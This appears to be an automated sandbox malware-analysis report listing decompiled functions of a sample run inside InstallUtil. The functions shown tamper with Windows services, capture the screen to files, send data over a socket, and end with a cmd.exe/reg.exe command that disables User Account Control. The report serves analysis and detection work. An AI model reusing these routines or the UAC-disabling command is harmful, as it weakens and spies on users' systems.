0x00417526
0x00417527
0x00417527
0x00417576
0x00417583

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00416C0C,00000000), ref: 00417506
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00416C0C,00000000), ref: 0041751A
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 00417527
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00416C0C,00000000), ref: 0041755C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 0041756E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00416C0C,00000000), ref: 00417571

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: 3972264b078da9f6f9256ab5ce7a0d6e2e03e53fd051797eab198ccce29f9cd6
Instruction ID: 21c1e16b7769188433a76f907045e3d1a45979cf2c58f7482296d030932d7e0f
Opcode Fuzzy Hash: 3972264b078da9f6f9256ab5ce7a0d6e2e03e53fd051797eab198ccce29f9cd6
Instruction Fuzzy Hash: 04014E3118C2247AD6105B34DC0EEBF3A7DDB41775F200317F616961D1D974CE8191A9

Uniqueness

Uniqueness Score: -1.00%

Function 00444255 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00444255(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x46c1cc; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00441BB3(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00444852(_t25, _t36, __eflags,  *0x46c1cc, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E004440C7(_t25, _t31, 0x46d654);
							E004427C2(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E004427C2();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E004421B4(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x46c1cc; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00441BB3(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00444852(_t27, _t37, __eflags,  *0x46c1cc, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E004440C7(_t27, _t32, 0x46d654);
									E004427C2(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E004427C2();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E004447FC(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E004447FC(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00444255
0x00444255
0x00444255
0x0044425f
0x00444261
0x00444266
0x00444269
0x00444277
0x0044427e
0x00444283
0x00444286
0x00444289
0x0044429b
0x004442a0
0x004442a2
0x004442ad
0x004442b4
0x004442b9
0x004442bc
0x004442be
0x00000000
0x00000000
0x00000000
0x00000000
0x004442a4
0x004442a4
0x00000000
0x004442a4
0x0044428b
0x0044428b
0x0044428c
0x0044428c
0x00444291
0x004442cc
0x004442cd
0x004442d3
0x004442d8
0x004442db
0x004442dc
0x004442dd
0x004442e4
0x004442e6
0x004442e8
0x004442ed
0x004442f0
0x004442fe
0x0044430a
0x0044430d
0x00444310
0x00444322
0x00444327
0x00444329
0x00444334
0x0044433a
0x00444342
0x00444344
0x00000000
0x00000000
0x00000000
0x00000000
0x0044432b
0x0044432b
0x00000000
0x0044432b
0x00444312
0x00444312
0x00444313
0x00444313
0x00444346
0x00444347
0x00444347
0x004442f2
0x004442f8
0x004442fc
0x0044434f
0x00444350
0x00444356
0x00000000
0x00000000
0x00000000
0x004442fc
0x0044435d
0x0044435d
0x0044426b
0x00444271
0x00444275
0x004442c0
0x004442c1
0x004442cb
0x00000000
0x00000000
0x00000000
0x00444275

APIs

GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
_free.LIBCMT ref: 0044428C
_free.LIBCMT ref: 004442B4
SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442C1
SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
_abort.LIBCMT ref: 004442D3

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: b1307c93ddf9507e0e4d6fca6a33c4fc371b4ac402e4da2ecf8816b9163aca1a
Instruction ID: 88808196462d03fdc4b6c03d2974d154c1a5feaca9f0faec2f71f660e385fb11
Opcode Fuzzy Hash: b1307c93ddf9507e0e4d6fca6a33c4fc371b4ac402e4da2ecf8816b9163aca1a
Instruction Fuzzy Hash: B2F0CD3660470126F2113376BC06B6B2515ABD27BDF35026BF61497293EFEDCC41456D

Uniqueness

Uniqueness Score: -1.00%

Function 00417324 Relevance: 9.0, APIs: 6, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417324(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x20);
				_t19 = OpenServiceW(_t20, E00401EC4( &_a4), 0x20);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EC9();
				return _t16;
			}

0x0041732f
0x0041733e
0x0041734d
0x00417351
0x00417372
0x00417375
0x00417378
0x00417353
0x00417354
0x00417354
0x0041737d
0x0041738a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00416EA1,00000000), ref: 00417333
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00416EA1,00000000), ref: 00417347
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416EA1,00000000), ref: 00417354
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00416EA1,00000000), ref: 00417363
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416EA1,00000000), ref: 00417375
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416EA1,00000000), ref: 00417378

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: aa950793e07e51a1e59a6bb1f25f5afc73491ee93f79d447db5bcdaa7598f71f
Instruction ID: f0d7bf5e26bd831e518b811c1ee1ccc879f402e6dffc6db71acbd568de72c4d3
Opcode Fuzzy Hash: aa950793e07e51a1e59a6bb1f25f5afc73491ee93f79d447db5bcdaa7598f71f
Instruction Fuzzy Hash: 82F0C2325043187BD2106B65EC89EBF3B7CDB85B6AB100026FE05961D2DA28CD8695F5

Uniqueness

Uniqueness Score: -1.00%

Function 0041748F Relevance: 9.0, APIs: 6, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041748F(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, E00401EC4( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EC9();
				return _t16;
			}

0x0041749a
0x004174a9
0x004174b8
0x004174bc
0x004174dd
0x004174e0
0x004174e3
0x004174be
0x004174bf
0x004174bf
0x004174e8
0x004174f5

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00416DA1,00000000), ref: 0041749E
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00416DA1,00000000), ref: 004174B2
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416DA1,00000000), ref: 004174BF
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00416DA1,00000000), ref: 004174CE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416DA1,00000000), ref: 004174E0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416DA1,00000000), ref: 004174E3

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 6666f2f330381e7dacfe183742ddf6315ec43087dc8b280ffa6ef286a89e3d2c
Instruction ID: 98f123d3c9bfd057a7262e957c8ab876c6d8e47b3b40811f7c9f2c5a750fd6a8
Opcode Fuzzy Hash: 6666f2f330381e7dacfe183742ddf6315ec43087dc8b280ffa6ef286a89e3d2c
Instruction Fuzzy Hash: 00F0C8715042187BD2116B65EC45DBF3F7CDB85766F100026FE09961D2DA28CD8685F9

Uniqueness

Uniqueness Score: -1.00%

Function 00416668 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00416668(void* __ecx, void* __edx, void* __eflags) {
				char _v1048;
				char _v1056;
				char _v1092;
				void* _v1096;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1136;
				char _v1144;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1184;
				char _v1200;
				void* _v1204;
				char _v1224;
				char _v1232;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t39;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t67;
				void* _t73;
				char* _t84;
				char* _t86;
				void* _t120;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				void* _t128;
				signed int _t129;
				void* _t131;

				_t134 = __eflags;
				_t131 = (_t129 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t74 = __edx;
				E00402FD4(__edx,  &_v1184, E0040413E(__edx,  &_v1156, __edx, _t128, __ecx), _t121, _t128, __eflags, L"png");
				E00401EC9();
				E0041578F( &_v1120, __edx, __eflags);
				_t84 =  &_v1120;
				_t39 =  *0x46dd04(E00401F6B(_t84), E0040243C(), 0, _t120, _t123, _t73);
				_t124 = _t39;
				E004151A8( &_v1144, _t124);
				_t86 = L"image/png";
				E00415B45(_t86,  &_v1112);
				E0041521D(E00401EC4( &_v1200),  &_v1152, _t43,  &_v1112);
				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
				if( *((char*)(E00401F6B(E00401E25(0x46e600,  &_v1112, _t128, _t134, 0x1b)))) == 1) {
					E0040209F(__edx,  &_v1224);
					E00401EC4( &_v1200);
					_t54 = E004189A5( &_v1224);
					_t136 = _t54;
					if(_t54 != 0) {
						DeleteFileW(E00401EC4( &_v1200));
						_t57 = E0040243C();
						E00405AE8( &_v1048, E00401F6B(0x46e5e8), _t57);
						_t60 = E0040243C();
						E00405C09(_t74,  &_v1056,  &_v1224,  &_v1184, E00401F6B( &_v1232), _t60);
						E00402FD4(_t74,  &_v1120, E0040413E(_t74,  &_v1092,  &_v1224, _t128, _t121), _t121, _t128, _t136, L"dat");
						E00401EC9();
						_t67 = E00401EC4( &_v1120);
						E004020B6(_t74, _t131 - 0x18, _t64, _t136,  &_v1200);
						E00418A12(_t67);
						E00401EC9();
						E00401F98();
					}
					_t48 = E00401F98();
				}
				E004151CB(_t48,  &_v1152);
				E00401F98();
				return E00401EC9();
			}

0x00416668
0x0041666e
0x00416677
0x00416679
0x00416690
0x0041669a
0x004166a7
0x004166b7
0x004166c1
0x004166c8
0x004166cf
0x004166db
0x004166e0
0x004166fc
0x00416704
0x0041671d
0x00416727
0x00416730
0x0041673b
0x00416740
0x00416742
0x00416752
0x0041675f
0x00416774
0x0041677d
0x00416799
0x004167b9
0x004167c6
0x004167d2
0x004167e3
0x004167ea
0x004167f9
0x00416802
0x00416802
0x0041680b
0x0041680b
0x00416814
0x0041681d
0x00416831

APIs

Part of subcall function 0041578F: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004157A9
Part of subcall function 0041578F: CreateCompatibleDC.GDI32(00000000), ref: 004157B6

SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004166C1

Part of subcall function 004151A8: GdipLoadImageFromStream.GDIPLUS(?,?,?,00415429,00000000), ref: 004151BC

Part of subcall function 0041521D: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000,00000000,00416701,00000000,?,?,00000000), ref: 0041522D

Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE

DeleteFileW.KERNEL32(00000000,0000001B,?,00000000), ref: 00416752

Strings

image/png, xrefs: 004166DB
dat, xrefs: 0041679E
png, xrefs: 0041667B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
String ID: dat$image/png$png
API String ID: 1095564277-186023265
Opcode ID: 04a6251478f05b36b005a299042fa33135e0c409688e4b5a94aec16b5f099b03
Instruction ID: 3e21688c9afd0cf2381ecff5dda46a3937492d8886aa81b8262bb5068297ec44
Opcode Fuzzy Hash: 04a6251478f05b36b005a299042fa33135e0c409688e4b5a94aec16b5f099b03
Instruction Fuzzy Hash: 2B4130721183405AC315FB21DC569EFB3A8AF91348F40093FF546A71E2EF389A49C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00404C9A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404C9A(void* __ecx, void* __edx, _Unknown_base(*)()* _a4, signed int _a12) {
				char _v24;
				char _v28;
				char _v40;
				void* _v44;
				char _v48;
				signed int _v52;
				void* _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v76;
				char _v80;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t61;
				void* _t65;
				struct _SECURITY_ATTRIBUTES* _t67;
				signed int _t73;
				void* _t90;
				_Unknown_base(*)()* _t92;
				void* _t94;
				void* _t96;
				void* _t97;
				void* _t98;

				_t90 = __edx;
				_t97 =  &_v56;
				_v52 = _v52 & 0x00000000;
				_t94 = __ecx;
				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
				E0040209F(_t65,  &_v48);
				_t7 = _t94 + 0x58; // 0x46e2d0
				_t35 = _t7;
				_t92 = _a4;
				while(E00404ED2(_t94, E00401F6B(_t92),  &_v52, _t35) != 0) {
					_t10 = _t94 + 0x30; // 0x8
					_t73 =  *_t10 & 0x000000ff;
					_a12 = _t73;
					_t96 = _v52 + _t73;
					if(_t96 <= E0040243C()) {
						_t67 = 0;
						__eflags = 0;
					} else {
						_t67 = 1;
						 *((intOrPtr*)(_t94 + 0x54)) = _t96 - E0040243C();
					}
					if(_t67 == 0) {
						E00401FA2( &_v60, _t90, _t94, E00404162(_t92,  &_v24, _a12, 0xffffffff));
						E00401F98();
						E00401FA2( &_v76, _t90, _t94, E00404162( &_v64,  &_v40, 0, _v68));
						E00401F98();
						_t103 = _t67;
						if(_t67 != 0) {
							_t25 = _t94 + 0xc; // 0x46e284
							E00401F80(_t25,  &_v80);
							 *(_t94 + 0x24) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a4, _t94, 0, 0);
							_t28 = _t94 + 0x24; // 0x0
							WaitForSingleObject( *_t28, 0xffffffff);
							_t29 = _t94 + 0x24; // 0x0
							CloseHandle( *_t29);
						} else {
							_t98 = _t97 - 0x18;
							E004020B6(_t67, _t98, _t90, _t103,  &_v80);
							_a4(_t94);
							_t97 = _t98 + 0x1c;
						}
						E00401FA2(_t92, _t90, _t94, E00404162(_t92,  &_v28, _t96, 0xffffffff));
						E00401F98();
						_t61 = E0040243C();
						_t32 = _t94 + 0x58; // 0x46e2d0
						_t35 = _t32;
						if(_t61 != 0) {
							continue;
						}
					}
					break;
				}
				return E00401F98();
			}

0x00404c9a
0x00404c9a
0x00404c9d
0x00404ca5
0x00404cac
0x00404cb0
0x00404cb9
0x00404cb9
0x00404cbc
0x00404cc0
0x00404cdd
0x00404cdd
0x00404ce5
0x00404ce9
0x00404cf4
0x00404d08
0x00404d08
0x00404cf6
0x00404cf8
0x00404d03
0x00404d03
0x00404d0c
0x00404d29
0x00404d32
0x00404d50
0x00404d59
0x00404d62
0x00404d64
0x00404d7c
0x00404d7f
0x00404d90
0x00404d93
0x00404d9e
0x00404da6
0x00404da9
0x00404daf
0x00404db2
0x00404d66
0x00404d66
0x00404d6c
0x00404d72
0x00404d76
0x00404d76
0x00404dca
0x00404dd3
0x00404dda
0x00404de1
0x00404de1
0x00404de4
0x00000000
0x00000000
0x00404de4
0x00000000
0x00404d0c
0x00404dfa

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,0046E2D0), ref: 00404D8A
CreateThread.KERNEL32 ref: 00404D9E
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DA9
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DB2

Strings

Cv, xrefs: 00404D9E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: Cv
API String ID: 3360349984-4177205600
Opcode ID: 1217cf8e55ce48f58d1276ac7614cdbe116c8fa169b7e7139f6e5aa73c71365f
Instruction ID: a955660fc8b68b008618d99eb87fe80d3fde0e99a872e2c995a4ba911630cac4
Opcode Fuzzy Hash: 1217cf8e55ce48f58d1276ac7614cdbe116c8fa169b7e7139f6e5aa73c71365f
Instruction Fuzzy Hash: 5F4183B1204301AFC710FB62DC55D7FB7EDAFD5358F40093EB582A22E1DB3899098656

Uniqueness

Uniqueness Score: -1.00%

Function 00404A78 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00404A78(void* __ecx, void* __edx, void* __eflags, char _a4, char _a8) {
				char _v12;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t23;
				void* _t38;
				void* _t40;
				void* _t46;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;

				_t67 = __ecx;
				_t23 = E0040243C();
				_t68 = 4;
				_v12 = _t23 + _t68;
				E004051E3(0,  &_v36, __edx, __ecx, _t71, 0xc, 0);
				_t4 = _t67 + 0x2c; // 0x46e2a4
				E00433220(E004051BA(0), _t4, _t68);
				E00433220(E004051BA(_t68),  &_v12, _t68);
				E00433220(E004051BA(8),  &_a4, _t68);
				_t10 =  &_a8; // 0x405454
				L00403336(_t10);
				if( *((intOrPtr*)(_t67 + 1)) != 0) {
					_t16 = _t67 + 0x70; // 0x0
					WaitForSingleObject( *_t16, 0xffffffff);
					_push( &_v36);
					_t38 = E0040243C();
					_t40 = E0041DBAE(E00401F6B( &_v36), _t38);
					_t20 = _t67 + 0x70; // 0x0
					_t70 =  ==  ? 0xffffffff : _t40;
					SetEvent( *_t20);
				} else {
					_t46 = E00401F6B( &_v36);
					_t15 = _t67 + 4; // 0xffffffff
					__imp__#19( *_t15, _t46, E0040243C(), 0);
					_t70 = _t46;
				}
				E00401F98();
				E00401F98();
				return _t70;
			}

0x00404a81
0x00404a86
0x00404a8d
0x00404a98
0x00404a9b
0x00404aa1
0x00404aaf
0x00404ac6
0x00404ade
0x00404ae6
0x00404aed
0x00404af5
0x00404b1b
0x00404b1e
0x00404b24
0x00404b28
0x00404b3b
0x00404b44
0x00404b49
0x00404b4c
0x00404af7
0x00404b04
0x00404b0a
0x00404b0d
0x00404b13
0x00404b13
0x00404b55
0x00404b5d
0x00404b6a

APIs

send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
WaitForSingleObject.KERNEL32(00000000,00000000,TT@s,?,?,00000004,?,?,00000004,?,0046E278,R@), ref: 00404B1E
SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,0046E278,R@,?,?,?,?,?,00405454), ref: 00404B4C

Strings

R@, xrefs: 00404A7E
TT@s, xrefs: 00404A83, 00404AE6, 00404B5A, 00404AEC

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitsend
String ID: TT@s$R@
API String ID: 3963590051-3366521986
Opcode ID: 1bfaf1815a1ae2dfa1d84171bf79883cc81e8456e78b5315919ff49e78cdf2db
Instruction ID: cef19ae2947ed44f79612548558f6db2e3a0f025ca0187bae19ad5cdadfcf086
Opcode Fuzzy Hash: 1bfaf1815a1ae2dfa1d84171bf79883cc81e8456e78b5315919ff49e78cdf2db
Instruction Fuzzy Hash: F62141729005197BDB04BBA1DC85DEFB73CFE14318F04453AF906B61E2EA78AA14C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 00417F9B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
timesleepCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00417F9B(void* __edx) {
				char _v12;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				void* _v52;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t36;

				_t36 = __edx;
				 *0x46deac( &_v12,  &_v36,  &_v44);
				Sleep(0x3e8);
				 *0x46deac( &_v32,  &_v40,  &_v64);
				_t21 = E00418045();
				_t22 = E00418045();
				asm("sbb ebx, edx");
				_t23 = E00418045();
				asm("sbb ebx, edx");
				_t24 = E00418045();
				asm("adc ebx, edx");
				_t25 = E00418045();
				asm("sbb esi, edx");
				_t26 = E00418045();
				asm("adc esi, edx");
				return E00452F70(E00452F30(_t21 - _t22 - _t23 + _t24 - _t25 + _t26, _t36, 0x64, 0), _t36, _t21 - _t22 - _t23 + _t24, _t36);
			}

0x00417f9b
0x00417fb1
0x00417fbc
0x00417fd1
0x00417fdb
0x00417fe8
0x00417ff3
0x00417ff5
0x00418000
0x00418002
0x0041800d
0x0041800f
0x0041801e
0x00418020
0x0041802b
0x00418044

APIs

GetSystemTimes.KERNEL32(?,?,?,0046E66C,?,?,00000000), ref: 00417FB1
Sleep.KERNEL32(000003E8,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00414300), ref: 00417FBC
GetSystemTimes.KERNEL32(?,?,?,?,?,00000000), ref: 00417FD1
__aulldiv.LIBCMT ref: 00418038

Strings

Rv, xrefs: 00417FB1, 00417FD1

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID: Rv
API String ID: 188215759-1554961537
Opcode ID: f13282ae7710d5f482574e8a99fb2f03a0c1c33a2c5390b4d67ff7d187a9c977
Instruction ID: b85cfcace345bbc5372e129741c6002aa5612915ee928d2ddd28b3df6cb5d97b
Opcode Fuzzy Hash: f13282ae7710d5f482574e8a99fb2f03a0c1c33a2c5390b4d67ff7d187a9c977
Instruction Fuzzy Hash: C01190735043486BC344FAB5CC84DEF7BACABC8344F050A3EB54682042EE69D64C8696

Uniqueness

Uniqueness Score: -1.00%

Function 00419DF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00419DF8() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E004337A0(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E00419E78;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}

0x00419e0a
0x00419e14
0x00419e1e
0x00419e24
0x00419e2e
0x00419e31
0x00419e32
0x00419e39
0x00419e3c
0x00419e3d
0x00419e40
0x00419e41
0x00419e43
0x00419e4d
0x00419e6f
0x00000000
0x00419e6f
0x00419e5f
0x00419e67
0x00419e69
0x00000000
0x00419e69
0x00419e77

APIs

RegisterClassExA.USER32(00000030), ref: 00419E44
CreateWindowExA.USER32 ref: 00419E5F
GetLastError.KERNEL32 ref: 00419E69

Strings

MsgWindowClass, xrefs: 00419E0F
0, xrefs: 00419E14

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 8940971b1c16ecf5bb3cc059dd364852bd2c5ce80a721d2baeadbc68405bdab8
Instruction ID: f37217452082710b428347957efa3b3c77c82e31665ca5093cf55cce8ba34a86
Opcode Fuzzy Hash: 8940971b1c16ecf5bb3cc059dd364852bd2c5ce80a721d2baeadbc68405bdab8
Instruction Fuzzy Hash: 2D0125B5E00318AFDB00DFE5DC849EFBBBCFB44359F40092AF801A6250E7749A048AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D5E2() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				long _t18;

				_t18 = 0x44;
				E004337A0(0,  &_v92, 0, _t18);
				_v92.cb = _t18;
				E004337A0(0,  &_v20, 0, 0x10);
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}

0x0040d5ec
0x0040d5f5
0x0040d5ff
0x0040d604
0x0040d628
0x0040d637
0x0040d643

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,0046E600,0046E63C), ref: 0040D628
